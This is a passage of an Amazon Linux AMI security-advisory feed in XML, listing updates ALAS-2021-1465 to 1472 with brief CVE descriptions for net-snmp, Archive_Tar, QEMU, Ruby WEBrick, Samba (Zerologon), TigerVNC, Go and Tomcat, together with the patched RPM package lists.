arch="i686"><filename>Packages/mysql56-errmsg-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.50-1.38.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.50" release="1.38.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.50-1.38.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1465</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1465: important priority package update for net-snmp</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-15862:
A flaw was found in Net-SNMP through version 5.73, where an Improper Privilege Management issue occurs due to SNMP WRITE access to the EXTEND MIB allows running arbitrary commands as root. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1873038: CVE-2020-15862 net-snmp: Improper Privilege Management in EXTEND MIB may lead to privileged commands execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15862" title="" id="CVE-2020-15862" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="net-snmp-debuginfo" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-debuginfo-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-python" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-python-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-perl-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-devel-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-libs-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="60.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/net-snmp-utils-5.5-60.22.amzn1.x86_64.rpm</filename></package><package name="net-snmp-debuginfo" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-debuginfo-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-python" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-python-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-libs" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-libs-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-perl" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-perl-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-devel" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-devel-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp-utils" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-utils-5.5-60.22.amzn1.i686.rpm</filename></package><package name="net-snmp" version="5.5" release="60.22.amzn1" epoch="1" arch="i686"><filename>Packages/net-snmp-5.5-60.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1466</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1466: medium priority package update for php7-pear</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-28949:
Archive_Tar through 1.4.10 has :// filename sanitization only to address phar attacks, and thus any other stream-wrapper attack (such as file:// to overwrite files) can still succeed.
1910323: CVE-2020-28949 Archive_Tar: improper filename sanitization leads to file overwrites
CVE-2020-28948:
Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked.
1904001: CVE-2020-28948 Archive_Tar: allows an unserialization attack because phar: is blocked but PHAR: is not blocked
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28948" title="" id="CVE-2020-28948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949" title="" id="CVE-2020-28949" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php7-pear" version="1.10.12" release="4.30.amzn1" epoch="1" arch="noarch"><filename>Packages/php7-pear-1.10.12-4.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1467</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1467: medium priority package update for qemu-kvm</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:20:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15890:
A use-after-free issue was found in the SLiRP networking implementation of the QEMU emulator. The issue occurs in ip_reass() routine while reassembling incoming packets, if the first fragment is bigger than the m->m_dat[] buffer. A user or process could use this flaw to crash the QEMU process on the host, resulting in a denial of service.
1749716: CVE-2019-15890 QEMU: Slirp: use-after-free during packet reassembly
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15890" title="" id="CVE-2019-15890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-tools" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-156.25.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="156.25.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-156.25.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1468</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1468: medium priority package update for ruby20</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-25613:
An issue was discovered in Ruby through 2.5.8, 2.6.x through 2.6.6, and 2.7.x through 2.7.1. WEBrick, a simple HTTP server bundled with Ruby, had not checked the transfer-encoding header value rigorously. An attacker may potentially exploit this issue to bypass a reverse proxy (which also has a poor header check), which may lead to an HTTP Request Smuggling attack.
1883623: CVE-2020-25613 ruby: potential HTTP request smuggling in WEBrick
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25613" title="" id="CVE-2020-25613" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby20" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.39.amzn1.noarch.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.39.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14.1" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.39.amzn1.noarch.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.39.amzn1.noarch.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.39.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.39.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.39.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.39.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.39.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.39.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1469</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1469: critical priority package update for samba</title><issued date="2021-01-12 22:51:00" /><updated date="2021-01-13 18:21:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1472:
A flaw was found in the Microsoft Windows Netlogon Remote Protocol (MS-NRPC), where it reuses a known, static, zero-value initialization vector (IV) in AES-CFB8 mode. This flaw allows an unauthenticated attacker to impersonate a domain-joined computer, including a domain controller, and possibly obtain domain administrator
privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1879822: CVE-2020-1472 samba: Netlogon elevation of privilege vulnerability (Zerologon)
CVE-2020-14323:
A null pointer dereference flaw was found in Samba's winbind service. This flaw allows a local user to crash the winbind service, causing a denial of service. The highest threat from this vulnerability is to system availability.
1891685: CVE-2020-14323 samba: Unprivileged user can crash winbind
CVE-2020-14318:
A flaw was found in the way samba handled file and directory permissions. An authenticated user could use this flaw to gain access to certain file and directory information which otherwise would be unavailable to the attacker.
1892631: CVE-2020-14318 samba: Missing handle permissions check in SMB1/2/3 ChangeNotify
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14318" title="" id="CVE-2020-14318" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14323" title="" id="CVE-2020-14323" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472" title="" id="CVE-2020-1472" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-winbind-modules" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="9.56.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-9.56.amzn1.noarch.rpm</filename></package><package name="samba" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="9.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-9.56.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="9.56.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-9.56.amzn1.noarch.rpm</filename></package><package name="samba-client" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-test-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.10.16-9.56.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.10.16" release="9.56.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.10.16-9.56.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1470</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1470: medium priority package update for tigervnc</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-15695:
TigerVNC version prior to 1.10.1 is vulnerable to stack buffer overflow, which could be triggered from CMsgReader::readSetCursor. This vulnerability occurs due to insufficient sanitization of PixelFormat. Since remote attacker can choose offset from start of the buffer to start writing his values, exploitation of this vulnerability could potentially result into remote code execution. This attack appear to be exploitable via network connectivity.
1790318: CVE-2019-15695 tigervnc: Stack buffer overflow in CMsgReader::readSetCursor
CVE-2019-15694:
TigerVNC version prior to 1.10.1 is vulnerable to heap buffer overflow, which could be triggered from DecodeManager::decodeRect. Vulnerability occurs due to the signdness error in processing MemOutStream. Exploitation of this vulnerability could potentially result into remote code execution. This attack appear to be exploitable via network connectivity.
1790315: CVE-2019-15694 tigervnc: Heap buffer overflow in DecodeManager::decodeRect
CVE-2019-15693:
TigerVNC version prior to 1.10.1 is vulnerable to heap buffer overflow, which occurs in TightDecoder::FilterGradient. Exploitation of this vulnerability could potentially result into remote code execution. This attack appear to be exploitable via network connectivity.
1790313: CVE-2019-15693 tigervnc: Heap buffer overflow in TightDecoder::FilterGradient
CVE-2019-15692:
TigerVNC version prior to 1.10.1 is vulnerable to heap buffer overflow. Vulnerability could be triggered from CopyRectDecoder due to incorrect value checks. Exploitation of this vulnerability could potentially result into remote code execution. This attack appear to be exploitable via network connectivity.
1789527: CVE-2019-15692 tigervnc: Heap buffer overflow triggered from CopyRectDecoder due to incorrect value checks
CVE-2019-15691:
TigerVNC version prior to 1.10.1 is vulnerable to stack use-after-return, which occurs due to incorrect usage of stack memory in ZRLEDecoder. If decoding routine would throw an exception, ZRLEDecoder may try to access stack variable, which has been already freed during the process of stack unwinding. Exploitation of this vulnerability could potentially result into remote code execution. This attack appear to be exploitable via network connectivity.
1789908: CVE-2019-15691 tigervnc: Stack use-after-return due to incorrect usage of stack memory in ZRLEDecoder
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15691" title="" id="CVE-2019-15691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15692" title="" id="CVE-2019-15692" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15693" title="" id="CVE-2019-15693" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15694" title="" id="CVE-2019-15694" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15695" title="" id="CVE-2019-15695" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tigervnc" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-module-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-debuginfo-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/tigervnc-server-1.8.0-21.34.amzn1.x86_64.rpm</filename></package><package name="tigervnc-debuginfo" version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-debuginfo-1.8.0-21.34.amzn1.i686.rpm</filename></package><package name="tigervnc" version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-1.8.0-21.34.amzn1.i686.rpm</filename></package><package name="tigervnc-server-module" version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-module-1.8.0-21.34.amzn1.i686.rpm</filename></package><package name="tigervnc-server" version="1.8.0" release="21.34.amzn1" epoch="0" arch="i686"><filename>Packages/tigervnc-server-1.8.0-21.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1471</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1471: medium priority package update for golang</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:27:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-28367:
Go before 1.14.12 and 1.15.x before 1.15.5 allows Argument Injection.
1897646: CVE-2020-28367 golang: improper validation of cgo flags can lead to code execution at build time
CVE-2020-28366:
Go before 1.14.12 and 1.15.x before 1.15.5 allows Code Injection.
1897643: CVE-2020-28366 golang: malicious symbol names can lead to code execution at build time
CVE-2020-28362:
Go before 1.14.12 and 1.15.x before 1.15.4 allows Denial of Service.
1897635: CVE-2020-28362 golang: math/big: panic during recursive division of very large numbers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28362" title="" id="CVE-2020-28362" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28366" title="" id="CVE-2020-28366" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28367" title="" id="CVE-2020-28367" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.5" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.15.5-1.65.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang" version="1.15.5" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.15.5-1.65.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.15.5" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.15.5-1.65.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.15.5" release="1.65.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.15.5-1.65.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.15.5" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.15.5-1.65.amzn1.i686.rpm</filename></package><package name="golang" version="1.15.5" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.15.5-1.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1472</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1472: low priority package update for tomcat7</title><issued date="2021-01-12 22:52:00" /><updated date="2021-01-13 18:28:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1935:
In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.
A flaw was found in Apache Tomcat. The HTTP header parsing code used an approach to end-of-line (EOL) parsing that allowed some invalid HTTP headers to be parsed as valid. This led to the possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. The highest threat with this vulnerability is system availability.
1806835: CVE-2020-1935 tomcat: Mishandling of Transfer-Encoding header allows for HTTP request smuggling
